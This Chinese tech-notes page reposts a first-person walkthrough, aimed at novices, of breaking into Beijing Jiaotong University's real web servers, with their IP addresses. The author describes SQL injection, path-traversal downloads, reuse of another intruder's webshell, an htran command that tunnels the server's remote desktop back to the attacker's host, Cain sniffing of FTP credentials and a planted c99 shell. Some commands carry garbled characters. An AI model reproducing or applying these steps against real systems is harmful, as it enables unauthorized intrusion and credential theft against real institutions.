热门标签 | HotTags
当前位置:  开发笔记 > 编程语言 > 正文

对北交大主站的典型嗅探入侵

这是一次非常典型的嗅探入侵过程,目标就是我所在的学校——北京交通大学的主站。本次入侵过程中并没有用到什么新的技术,主要就是让新手朋友们能够了解一下如何通过嗅探来达到入侵的目的,在渗透入侵过程中最重要的

这是一次非常典型的嗅探入侵过程,目标就是我所在的学校——北京交通大学的主站。本次入侵过程中并没有用到什么新的技术,主要就是让新手朋友们能够了解一下如何通过嗅探来达到入侵的目的,在渗透入侵过程中最重要的就是思路的运用嘛。

一、信息刺探

主站的IP地址为202.112.144.31,我大致的看了一下,全是静态页面,在同服务器上也没有其它的站点,服务器只开了21和80端口,使用的是Linux系统,主站的安全肯定没得说,最起码凭我是拿不下来的。于是我初步决定利用嗅探,在服务器的同C段IP地址中扫描80端口,发现只有一个202.12.144.32开放着,那我们就来看看它的情况吧。

我使用nmap对它的端口情况进行了扫描,我又ping了一下,显示TTL为125,可能使用的是Windows操作系统。通过目前的扫描情况来看,我们对服务器所掌握的信息有:Windows系统、网络服务只有FTP、Web。分别访问了一下80和8080端口,发现是学生处和教务处的网站,使用的脚本分别为asp和jsp,看来最有可能的突破口的就是Web了。我们先去看看学生处的网站吧,首先是jsp的不好搞,其次一般学校对于教务处的安全也会比较重视。

二、初探虚实

看到asp的站点,最先想到的就是SQL注入了,随手点开了一个新闻的链接,在网址的的后面加了个" ' ",提交后出现了未闭合引号的错误,确定网站存在注入漏洞,把这个链接地址直接扔到了啊D中进行检测,结果顺利得到了密码,接下来就是寻找后台了,使用wwwscan扫描了一下站点的目录结构,得到了manage和dbase这两个比较敏感的目录。在浏览器中访问,竟然发现可以遍历目录内容,得到了登录页面是login.asp,我又顺便访问了一下dbase,下载了dbase中的数据库文件,里面的管理员信息和利用注入点猜解出来的信息完全吻合。

登录网站后台,发现这个后台基本上没有什么权限,好在发现了还有eWebEditor编辑页面,利用这个网站内容编辑器拿webshell的方法有很多,我们点那个笑脸,添加一个表情,然后查看其地址,得到了eWebEditor的目录,我试了试默认密码、下载默认数据库,还有前段时间的上传页面的利用,但都失败了。而网站自己的那个后台,功能太过于简单了,利用这个后台搞破坏倒是可以,可是要想通过它获得webshell还是有一定难度的。

进行到这里,好像没什么可以利用的了,我便开始在上面瞎翻着,突然看到了ewebeditor下的上传目录uploadfile里有一个asa文件,莫非有“同道中人”以前来过了?试着访问了一下,哇,果真是我盼望已久的WebShell,但我们没有密码也只能看着这可爱的马儿干着急呀。

三、柳暗花明

思路到这里好像僵死了,我又想了想,既然已经有人进来过了,那就说明这个站点还是有可利用的地方,能够拿到webshell的,我继续在网站上瞎转悠,突然发现了有个资源下载的地方,链接的地址都是诸如这样,如果这个文件的FileUrl参数没有过滤“../”的话,那我们就可以通过“./”来跳出当前目录下载web目录中的其它文件了。

于是我就开始尝试以web根目录下的index.asp为标志,使用“./”来跳到站点根目录下,先试着提交“download.asp?FiLeUrl=.,/index.asp”,无法显示,跳出一级不可以,那就再问上跳一级,提交“download.asp?FileUrl一../../index

asp”,终于出现了下载框,这下就好办了,我们可以下载刚才遇到的那位前辈的webshell,查看源代码就可以知道登录密码,从而登录他的webshell了。

根据那个webshell的相对路径来构造“download,asp?FiloUrl=../../ewebe ditor/uploadfile/2008611568654565.asa”,成功的下载到了webshell,我打开一看,全是乱码啊,连密码部分也给加密了。可是开头的“<%@LANGUAGE= Vbscript.Encode%>”却提示我们这是使用ScriptEncoder加密的,我在解密文件后,得到了密码为abc123。

四、终结服务器系统权限

赶紧找到那个webshell,填上abc123点击登录,先使用脚本木马束扫描~下开放的端口,发现比远程扫描时多出了3389,应该是限制了登录IP段的缘故吧。

WScript.Shell没有删除,我执行了一下“net start”,竟然没有发现任何杀毒软件、防火墙的服务,同服务器上还有一个tomcat的教务处的网站,要是运行在system权限下,那我们可就省得提权了,于是我开始着手寻找教务处网站的根目录,试着访问一下D盘根目录,没想到在这里可以跳转到服务器上的任意目录,可读可写!于是我找到“D妇xx\jgjwc”目录,发现里面根本就没有网站文件,都是一些二进制的可执行文件。找不到站点的绝对路径,该怎么办呢?我在服务器上瞎翻着,突然想到了那个“同道中人”的webshell里有个搜索的功能,于是就在教务处主页上找了个链接,以网址中一个特别长的文件名作为关键字来进行搜索,比如“infor_detail_window.jsp”,只搜索出了一个结果,是在D:\xxxkxxx\下的木马,在jsp webshell下执行whoami,发现权限是system。

虽然在jsp webshell下我们已经是系统权限了,可是要想进行嗅探还得图形界面才更方便一些,于是我开始尝试连接对方的远程桌面。在自己的电脑上扫描不到3389端口,而在脚本木马中扫描却是开放的,这说明网站限制了其它IP的登录,这个难不倒我,可以使用htran进行端口的转发。使用webshel响服务器上传htran,这里我传到了D:\xxx\sys.exe,然后在本地运行Htran,命令为“htran.exe-Listen 9999 8888”,就是开启9999和8888端口,端口9999用于监听。然后再在webshell执行“D:\xxx\sys,exe -Slavex.x.x.x 9999 127.0.0.1 3389”,就是将服务器的3389端口映射到我电脑的9999端口上,命令执行成功后我们就会在本地运行htran的CMD窗口中看到服务器已经连接到本地的9999端口了,通过连接本地的8888端口就可以顺利登录到服务器的远程桌面了。

五、嗅探拿下主站web权限

在教务处服务器上执行“tracert 202.112.144.3”,证明自己和主站是在同一交换环境下,满足嗅探的条件。我们安装好Cain和WinPc ap驱动后就开始针对202.112.144.31进行了嗅探,运气还不错,上午刚开始,下午便嗅出了目标的2个ftp用户,其中一个是webadmin,很像是网站的管理帐户啊,登录上去,发现ftp目录就是web目录。我传上去了一个c99,至此交大主站的web权限就已拿到手了。使用一些公布出来的本地溢出也都没有成功,我自己对Linux系统也不熟悉,于是就没有再尝试提权。


推荐阅读
  • Linux如何安装Mongodb的详细步骤和注意事项
    本文介绍了Linux如何安装Mongodb的详细步骤和注意事项,同时介绍了Mongodb的特点和优势。Mongodb是一个开源的数据库,适用于各种规模的企业和各类应用程序。它具有灵活的数据模式和高性能的数据读写操作,能够提高企业的敏捷性和可扩展性。文章还提供了Mongodb的下载安装包地址。 ... [详细]
  • MySQL语句大全:创建、授权、查询、修改等【MySQL】的使用方法详解
    本文详细介绍了MySQL语句的使用方法,包括创建用户、授权、查询、修改等操作。通过连接MySQL数据库,可以使用命令创建用户,并指定该用户在哪个主机上可以登录。同时,还可以设置用户的登录密码。通过本文,您可以全面了解MySQL语句的使用方法。 ... [详细]
  • 本文介绍了一个免费的asp.net控件,该控件具备数据显示、录入、更新、删除等功能。它比datagrid更易用、更实用,同时具备多种功能,例如属性设置、数据排序、字段类型格式化显示、密码字段支持、图像字段上传和生成缩略图等。此外,它还提供了数据验证、日期选择器、数字选择器等功能,以及防止注入攻击、非本页提交和自动分页技术等安全性和性能优化功能。最后,该控件还支持字段值合计和数据导出功能。总之,该控件功能强大且免费,适用于asp.net开发。 ... [详细]
  • 目录浏览漏洞与目录遍历漏洞的危害及修复方法
    本文讨论了目录浏览漏洞与目录遍历漏洞的危害,包括网站结构暴露、隐秘文件访问等。同时介绍了检测方法,如使用漏洞扫描器和搜索关键词。最后提供了针对常见中间件的修复方式,包括关闭目录浏览功能。对于保护网站安全具有一定的参考价值。 ... [详细]
  • 基于PgpoolII的PostgreSQL集群安装与配置教程
    本文介绍了基于PgpoolII的PostgreSQL集群的安装与配置教程。Pgpool-II是一个位于PostgreSQL服务器和PostgreSQL数据库客户端之间的中间件,提供了连接池、复制、负载均衡、缓存、看门狗、限制链接等功能,可以用于搭建高可用的PostgreSQL集群。文章详细介绍了通过yum安装Pgpool-II的步骤,并提供了相关的官方参考地址。 ... [详细]
  • 本文介绍了在开发Android新闻App时,搭建本地服务器的步骤。通过使用XAMPP软件,可以一键式搭建起开发环境,包括Apache、MySQL、PHP、PERL。在本地服务器上新建数据库和表,并设置相应的属性。最后,给出了创建new表的SQL语句。这个教程适合初学者参考。 ... [详细]
  • 如何在服务器主机上实现文件共享的方法和工具
    本文介绍了在服务器主机上实现文件共享的方法和工具,包括Linux主机和Windows主机的文件传输方式,Web运维和FTP/SFTP客户端运维两种方式,以及使用WinSCP工具将文件上传至Linux云服务器的操作方法。此外,还介绍了在迁移过程中需要安装迁移Agent并输入目的端服务器所在华为云的AK/SK,以及主机迁移服务会收集的源端服务器信息。 ... [详细]
  • Oracle :修改数据库服务器字符集 ... [详细]
  • 背景应用安全领域,各类攻击长久以来都危害着互联网上的应用,在web应用安全风险中,各类注入、跨站等攻击仍然占据着较前的位置。WAF(Web应用防火墙)正是为防御和阻断这类攻击而存在 ... [详细]
  • 如何更改电脑系统的自动校时服务器地址?
    本文介绍了如何通过注册表编辑器更改电脑系统的自动校时服务器地址。通过修改注册表中的数值数据或新建字符串数值的方式,可以将默认的时钟同步服务器地址更改为自己所需要的域名或IP地址。详细步骤包括双击时间区域,点击internet时间,勾选自动校正域名设置定时等操作。 ... [详细]
  • 本文介绍了在Windows系统下安装Python、setuptools、pip和virtualenv的步骤,以及安装过程中需要注意的事项。详细介绍了Python2.7.4和Python3.3.2的安装路径,以及如何使用easy_install安装setuptools。同时提醒用户在安装完setuptools后,需要继续安装pip,并注意不要将Python的目录添加到系统的环境变量中。最后,还介绍了通过下载ez_setup.py来安装setuptools的方法。 ... [详细]
  • 本文介绍了互联网思维中的三个段子,涵盖了餐饮行业、淘品牌和创业企业的案例。通过这些案例,探讨了互联网思维的九大分类和十九条法则。其中包括雕爷牛腩餐厅的成功经验,三只松鼠淘品牌的包装策略以及一家创业企业的销售额增长情况。这些案例展示了互联网思维在不同领域的应用和成功之道。 ... [详细]
  • 本文介绍了Windows Vista操作系统中的用户账户保护功能,该功能是为了增强系统的安全性而设计的。通过对Vista测试版的体验,可以看到系统在安全性方面的进步。该功能的引入,为用户的账户安全提供了更好的保障。 ... [详细]
  • Unity3D引擎的体系结构和功能详解
    本文详细介绍了Unity3D引擎的体系结构和功能。Unity3D是一个屡获殊荣的工具,用于创建交互式3D应用程序。它由游戏引擎和编辑器组成,支持C#、Boo和JavaScript脚本编程。该引擎涵盖了声音、图形、物理和网络功能等主题。Unity编辑器具有多语言脚本编辑器和预制装配系统等特点。本文还介绍了Unity的许可证情况。Unity基本功能有限的免费,适用于PC、MAC和Web开发。其他平台或完整的功能集需要购买许可证。 ... [详细]
  • 本文介绍了解决mysql 5.1启动问题的方法,通过修改my.ini文件中的相关配置,包括innodb_data_home_dir和skip-innodb等,可以解决启动问题。同时还介绍了如何调整内存池来存储metadata信息。 ... [详细]
author-avatar
job2672488
这个家伙很懒,什么也没留下!
PHP1.CN | 中国最专业的PHP中文社区 | DevBox开发工具箱 | json解析格式化 |PHP资讯 | PHP教程 | 数据库技术 | 服务器技术 | 前端开发技术 | PHP框架 | 开发工具 | 在线工具
Copyright © 1998 - 2020 PHP1.CN. All Rights Reserved | 京公网安备 11010802041100号 | 京ICP备19059560号-4 | PHP1.CN 第一PHP社区 版权所有